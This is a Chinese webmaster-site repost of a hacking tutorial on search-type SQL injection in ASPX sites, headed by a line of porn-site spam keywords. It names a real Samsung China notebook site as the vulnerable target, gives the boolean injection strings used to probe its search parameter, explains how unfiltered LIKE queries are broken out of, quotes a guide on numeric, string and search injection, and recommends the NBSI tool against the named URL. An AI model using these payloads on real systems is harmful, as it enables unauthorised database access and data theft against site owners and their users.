亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 安全教程 查看內容

ASPX搜索型注入

2022-9-24 10:23| 查看: 2462 |來源: 互聯網

今天看到有個關于搜索型注入的文章,用到的是一種新技術,探測的是三星:http://notebook.samsung.com.cn/index.aspx 注入方式是: 一般網站的搜索都是 ...

今天看到有個關于搜索型注入的文章,用到的是一種新技術,探測的是三星:http://notebook.samsung.com.cn/index.aspx

注入方式是:

一般網站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=
構造注入語句 三星%’and 1=1 and ’%’=’  
             三星%’and 1=2 and ’%’=’

大家看到了吧 兩個返回頁面是不一樣的 說明有注入的漏洞 特征字 寫 筆記本 就是三星%’and 1=1 and ’%’=’ 返回時有的


我們知道一般搜索代碼是這么寫的:

Select * from 表名 where 字段 like ’%關鍵字%’

這樣就造成了對關鍵字前后的所有匹配(%是用來全部匹配的)

這里如果關鍵字沒有過濾的話,就可以這樣來構造:

關鍵字=’ and [查詢條件] and ‘%’=’

這樣查詢就變成

select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’

這樣就很好的構成了一個sql注入點,當然用手工也可以,用nbsi也可以~~

注入是不分家的,沒必要什么型什么型的!~

如果不信,大家請看下面的《sql注入天書》的原話

第一節、SQL注入的一般步驟

首先,判斷環境,尋找注入點,判斷數據庫類型,這在入門篇已經講過了。

其次,根據注入參數類型,在腦海中重構SQL語句的原貌,按參數類型主要分為下面三種:

(A)   ID=49 這類注入的參數是數字型,SQL語句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數為ID=49 And [查詢條件],即是生成語句:
Select * from 表名 where 字段=49 And [查詢條件]


(B) Class=連續劇 這類注入的參數是字符型,SQL語句原貌大致概如下:
Select * from 表名 where 字段=’連續劇’  
注入的參數為Class=連續劇’ and [查詢條件] and ‘’=’ ,即是生成語句:
Select * from 表名 where 字段=’連續劇’ and [查詢條件] and ‘’=’’

(C) 搜索時沒過濾參數的,如keyword=關鍵字,SQL語句原貌大致如下:
Select * from 表名 where 字段like ’%關鍵字%’  
注入的參數為keyword=’ and [查詢條件] and ‘%’=’, 即是生成語句:
Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’


當然手工是麻煩的

用工具的話,我建議用nbsi的工具比較好,就我感覺只有nbsi結合了這個技術,用別的軟體是不能注入的

注入點只要寫:

http://notebook.samsung.com.cn/news/news.aspx?& ... &ST=title&SC=%

再加個特征字符就可以了

tag標簽:ASPX 搜索型 注入
本文最后更新于 2022-9-24 10:23,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部